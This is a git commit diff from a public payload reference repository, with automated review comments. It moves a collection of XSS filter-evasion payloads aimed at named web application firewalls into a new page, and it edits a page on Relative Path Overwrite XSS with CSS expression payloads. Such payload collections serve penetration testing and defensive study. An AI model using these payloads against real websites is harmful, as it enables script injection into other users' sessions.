mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-24 05:15:26 +00:00
WAF bypass moved to a separate page
This commit is contained in:
parent
2e73069238
commit
c34a2bac15
@ -82,23 +82,6 @@
- [Bypass CSP unsafe-inline](#bypass-csp-unsafe-inline)
- [Bypass CSP unsafe-inline](#bypass-csp-unsafe-inline)
- [Bypass CSP script-src self](#bypass-csp-script-src-self)
- [Bypass CSP script-src self](#bypass-csp-script-src-self)
- [Bypass CSP script-src data](#bypass-csp-script-src-data)
- [Bypass CSP script-src data](#bypass-csp-script-src-data)
- [Common WAF Bypass](#common-waf-bypass)
- [Cloudflare XSS Bypasses by @Bohdan Korzhynskyi](#cloudflare-xss-bypasses-by-bohdan-korzhynskyi)
- [25st January 2021](#25st-january-2021)
- [21st April 2020](#21st-april-2020)
- [22nd August 2019](#22nd-august-2019)
- [5th June 2019](#5th-june-2019)
- [3rd June 2019](#3rd-june-2019)
- [Cloudflare XSS Bypass - 22nd March 2019 (by @RakeshMane10)](#cloudflare-xss-bypass---22nd-march-2019-by-rakeshmane10)
- [Cloudflare XSS Bypass - 27th February 2018](#cloudflare-xss-bypass---27th-february-2018)
- [Chrome Auditor - 9th August 2018](#chrome-auditor---9th-august-2018)
- [Incapsula WAF Bypass by @Alra3ees- 8th March 2018](#incapsula-waf-bypass-by-alra3ees--8th-march-2018)
- [Incapsula WAF Bypass by @c0d3G33k - 11th September 2018](#incapsula-waf-bypass-by-c0d3g33k---11th-september-2018)
- [Incapsula WAF Bypass by @daveysec - 11th May 2019](#incapsula-waf-bypass-by-daveysec---11th-may-2019)
- [Akamai WAF Bypass by @zseano - 18th June 2018](#akamai-waf-bypass-by-zseano---18th-june-2018)
- [Akamai WAF Bypass by @s0md3v - 28th October 2018](#akamai-waf-bypass-by-s0md3v---28th-october-2018)
- [WordFence WAF Bypass by @brutelogic - 12th September 2018](#wordfence-waf-bypass-by-brutelogic---12th-september-2018)
- [Fortiweb WAF Bypass by @rezaduty - 9th July 2019](#fortiweb-waf-bypass-by-rezaduty---9th-july-2019)
- [References](#references)
- [References](#references)

## Vulnerability Details
## Vulnerability Details
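Review bot: the table-of-contents entries for the WAF bypass material are dropped here, but nothing in this hunk adds an entry pointing at the new `XSS Injection/XSS Common WAF Bypass.md` page, so README readers lose the only path to that content; add a bullet linking to the new file, following the format of the neighbouring `- [Bypass CSP ...](#...)` entries (a relative file link rather than an anchor, since the section no longer lives in this document).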
@ -1254,111 +1237,11 @@ GET /?xss=<script>alert(1)</script>&a&a&a&a&a&a&a&a...[REPEATED &a 1000 times]&a
Source: [@pilvar222](https://twitter.com/pilvar222/status/1784618120902005070)
Source: [@pilvar222](https://twitter.com/pilvar222/status/1784618120902005070)

## Common WAF Bypass

### Cloudflare XSS Bypasses by [@Bohdan Korzhynskyi](https://twitter.com/bohdansec)

#### 25st January 2021

```html
<svg/onrandom=random onload=confirm(1)>
<video onnull=null onmouseover=confirm(1)>
```

#### 21st April 2020

```html
<svg/OnLoad="`${prompt``}`">
```

#### 22nd August 2019

```html
<svg/onload=%26nbsp;alert`bohdan`+
```

#### 5th June 2019

```html
1'"><img/src/onerror=.1|alert``>
```

#### 3rd June 2019

```html
<svg onload=prompt%26%230000000040document.domain)>
<svg onload=prompt%26%23x000000028;document.domain)>
xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
```

### Cloudflare XSS Bypass - 22nd March 2019 (by @RakeshMane10)

```
<svg/onload=alert()//
```

### Cloudflare XSS Bypass - 27th February 2018

```html
<a href="j	a	v	asc
ri	pt:(a	l	e	r	t	(document.domain))">X</a>
```

### Chrome Auditor - 9th August 2018

```javascript
</script><svg><script>alert(1)-%26apos%3B
```

Live example by @brutelogic - [https://brutelogic.com.br/xss.php](https://brutelogic.com.br/xss.php?c1=</script><svg><script>alert(1)-%26apos%3B)

### Incapsula WAF Bypass by [@Alra3ees](https://twitter.com/Alra3ees/status/971847839931338752)- 8th March 2018

```javascript
anythinglr00</script><script>alert(document.domain)</script>uxldz
anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
```

### Incapsula WAF Bypass by [@c0d3G33k](https://twitter.com/c0d3G33k) - 11th September 2018

```javascript
<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
```

### Incapsula WAF Bypass by [@daveysec](https://twitter.com/daveysec/status/1126999990658670593) - 11th May 2019

```html
<svg onload\r\n=$.globalEval("al"+"ert()");>
```

### Akamai WAF Bypass by [@zseano](https://twitter.com/zseano) - 18th June 2018

```javascript
?"></script><base%20c%3D=href%3Dhttps:\mysite>
```

### Akamai WAF Bypass by [@s0md3v](https://twitter.com/s0md3v/status/1056447131362324480) - 28th October 2018

```html
<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>
```

### WordFence WAF Bypass by [@brutelogic](https://twitter.com/brutelogic) - 12th September 2018

```javascript
<a href=javascript:alert(1)>
```

### Fortiweb WAF Bypass by [@rezaduty](https://twitter.com/rezaduty) - 9th July 2019

```javascript
\u003e\u003c\u0068\u0031 onclick=alert('1')\u003e
```

## Labs
## Labs

* [PortSwigger Labs for XSS](https://portswigger.net/web-security/all-labs#cross-site-scripting)
* [PortSwigger Labs for XSS](https://portswigger.net/web-security/all-labs#cross-site-scripting)

## References
## References

- [Unleashing-an-Ultimate-XSS-Polyglot](https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot)
- [Unleashing-an-Ultimate-XSS-Polyglot](https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot)
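Review bot: the `Live example by @brutelogic - [https://brutelogic.com.br/xss.php](...)` line that accompanied the Chrome Auditor payload is deleted here but does not reappear anywhere in the new file added by this commit, so the attribution and the only reproducible reference for that entry are lost in the move; carry the line over to the new page (the Chrome Auditor section or its References list). The rest of the removal is a clean cut of the whole `## Common WAF Bypass` section, with the surrounding `## Labs` and `## References` context untouched.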
103
XSS Injection/XSS Common WAF Bypass.md
Normal file
@ -0,0 +1,103 @@
# Common WAF Bypass

## Cloudflare

* 25st January 2021 - [@Bohdan Korzhynskyi](https://twitter.com/bohdansec)

```js
<svg/onrandom=random onload=confirm(1)>
<video onnull=null onmouseover=confirm(1)>
```

* 21st April 2020 - [@Bohdan Korzhynskyi](https://twitter.com/bohdansec)

```js
<svg/OnLoad="`${prompt``}`">
```

* 22nd August 2019 - [@Bohdan Korzhynskyi](https://twitter.com/bohdansec)

```js
<svg/onload=%26nbsp;alert`bohdan`+
```

* 5th June 2019 - [@Bohdan Korzhynskyi](https://twitter.com/bohdansec)

```js
1'"><img/src/onerror=.1|alert``>
```

* 3rd June 2019 - [@Bohdan Korzhynskyi](https://twitter.com/bohdansec)

```js
<svg onload=prompt%26%230000000040document.domain)>
<svg onload=prompt%26%23x000000028;document.domain)>
xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
```

* 22nd March 2019 - @RakeshMane10

```js
<svg/onload=alert()//
```

* 27th February 2018

```html
<a href="j	a	v	asc
ri	pt:(a	l	e	r	t	(document.domain))">X</a>
```

## Chrome Auditor

NOTE: Chrome Auditor is deprecated and removed on latest version of Chrome and Chromium Browser.

* 9th August 2018

```javascript
</script><svg><script>alert(1)-%26apos%3B
```

## Incapsula WAF

* 11th May 2019 - [@daveysec](https://twitter.com/daveysec/status/1126999990658670593) -

```js
<svg onload\r\n=$.globalEval("al"+"ert()");>
```

* 8th March 2018 - [@Alra3ees](https://twitter.com/Alra3ees/status/971847839931338752)

```javascript
anythinglr00</script><script>alert(document.domain)</script>uxldz
anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
```

* 11th September 2018 - [@c0d3G33k](https://twitter.com/c0d3G33k)

```javascript
<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
```

## Akamai WAF

* 18th June 2018 - [@zseano](https://twitter.com/zseano)

```javascript
?"></script><base%20c%3D=href%3Dhttps:\mysite>
```

* 28th October 2018 - [@s0md3v](https://twitter.com/s0md3v/status/1056447131362324480)

```svg
<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>
```

## WordFence WAF

* 12th September 2018 - [@brutelogic](https://twitter.com/brutelogic)

```html
<a href=javascript:alert(1)>
```

## Fortiweb WAF

* 9th July 2019 - [@rezaduty](https://twitter.com/rezaduty)

```javascript
\u003e\u003c\u0068\u0031 onclick=alert('1')\u003e
```

## References

* [TODO](TODO)
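Review bot: the new page ships with a placeholder References section (`* [TODO](TODO)`) while the material it receives carried inline attributions in the old README (the brutelogic live-example link for the Chrome Auditor payload among them); fill the list in before merging so the moved entries keep their sources. Smaller points in the same file: `25st January 2021` should read `25th January 2021` (the old README and its anchor carried the same typo, so this is the moment to fix it); the `11th May 2019 - [@daveysec](...) -` bullet ends with a dangling hyphen; and the fences are tagged inconsistently (`js`, `javascript`, `html`, `svg`) for what are all HTML snippets, with `svg` not a language most renderers highlight, so `html` throughout would be cleaner. The deprecation `NOTE:` under `## Chrome Auditor` is a useful addition.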
@ -1,25 +1,24 @@
# XSS with Relative Path Overwrite - IE 8/9 and lower
# XSS with Relative Path Overwrite

:WARNING: Requires Internet Explorer 8/9 and lower.

You need these 3 components
You need these 3 components

```javascript
1. Stored XSS that allows CSS injection. : `{}*{xss:expression(open(alert(1)))}`
1) stored XSS that allows CSS injection. : {}*{xss:expression(open(alert(1)))}
2. URL Rewriting.
2) URL Rewriting.
3. Relative addressing to CSS style sheet : `../style.css`
3) Relative addressing to CSS style sheet : ../style.css
```

A little example
Here is the HTML code of `http://url.example.com/index.php/[RELATIVE_URL_INSERTED_HERE]`

```html
```html
http://url.example.com/index.php/[RELATIVE_URL_INSERTED_HERE]
<html>
<html>
<head>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<link href="[RELATIVE_URL_INSERTED_HERE]/styles.css" rel="stylesheet" type="text/css" />
<link href="[RELATIVE_URL_INSERTED_HERE]/styles.css" rel="stylesheet" type="text/css" />
</head>
</head>
<body>
<body>
Stored XSS with CSS injection - Hello {}*{xss:expression(open(alert(1)))}
Stored XSS with CSS injection - Hello {}*{xss:expression(open(alert(1)))}
</body>
</body>
</html>
</html>
```
```
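Review bot: the added `:WARNING: Requires Internet Explorer 8/9 and lower.` line uses an upper-case shortcode; GitHub-style emoji shortcodes are lower-case (`:warning:`), so as written it will render as literal text rather than the intended icon. Moving the IE requirement out of the title into a warning line, replacing the ```javascript fence around the three components with a numbered markdown list (with the payload and `../style.css` in backticks), and moving the example URL out of the ```html block into the `Here is the HTML code of ...` sentence are all improvements.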
@ -28,12 +27,13 @@ Explanation of the vulnerability
> The Meta element forces IE’s document mode into IE7 compatible which is required to execute expressions. Our persistent text {}*{xss:expression(open(alert(1)))is included on the page and in a realistic scenario it would be a profile page or maybe a shared status update which is viewable by other users. We use “open” to prevent client side DoS with repeated executions of alert.
> The Meta element forces IE’s document mode into IE7 compatible which is required to execute expressions. Our persistent text {}*{xss:expression(open(alert(1)))is included on the page and in a realistic scenario it would be a profile page or maybe a shared status update which is viewable by other users. We use “open” to prevent client side DoS with repeated executions of alert.
> A simple request of “rpo.php/” makes the relative style load the page itself as a style sheet. The actual request is “/labs/xss_horror_show/chapter7/rpo.php/styles.css” the browser thinks there’s another directory but the actual request is being sent to the document and that in essence is how an RPO attack works.
> A simple request of “rpo.php/” makes the relative style load the page itself as a style sheet. The actual request is “/labs/xss_horror_show/chapter7/rpo.php/styles.css” the browser thinks there’s another directory but the actual request is being sent to the document and that in essence is how an RPO attack works.

Demo 1 at `http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo.php`
* Demo 1 at `http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo.php`
Demo 2 at `http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo2.php/fakedirectory/fakedirectory2/fakedirectory3`
* Demo 2 at `http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo2.php/fakedirectory/fakedirectory2/fakedirectory3`
MultiBrowser : `http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo3.php`
* MultiBrowser : `http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo3.php`

From : `http://www.thespanner.co.uk/2014/03/21/rpo/`
From : `http://www.thespanner.co.uk/2014/03/21/rpo/`

## Mutated XSS for Browser IE8/IE9
## Mutated XSS for Browser IE8/IE9

```javascript
```javascript
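Review bot: in the unchanged quoted context at the top of this hunk, `{}*{xss:expression(open(alert(1)))is included` is missing the closing `}` and the space before `is`, so the payload as quoted differs from the `{}*{xss:expression(open(alert(1)))}` used in the example above; since this block is being touched anyway, worth fixing while here. Turning the three demo lines into `*` bullets is fine and matches the list style used elsewhere in the page.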
@ -46,4 +46,4 @@ IE will read and write (decode) HTML multiple time and attackers XSS payload wil

## References
## References

- [TODO](TODO)
- [RPO - Relative VS Absolute - The Spanner - Friday, 21 March 2014](http://www.thespanner.co.uk/2014/03/21/rpo/)
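Review bot: with the Spanner post now listed under References, the `From : \`http://www.thespanner.co.uk/2014/03/21/rpo/\`` line in the body above duplicates it; keep only the reference entry, which also carries the title and date. Replacing the `[TODO](TODO)` placeholder with the actual source is the right fix and the same should be done for the new WAF bypass page added in this commit.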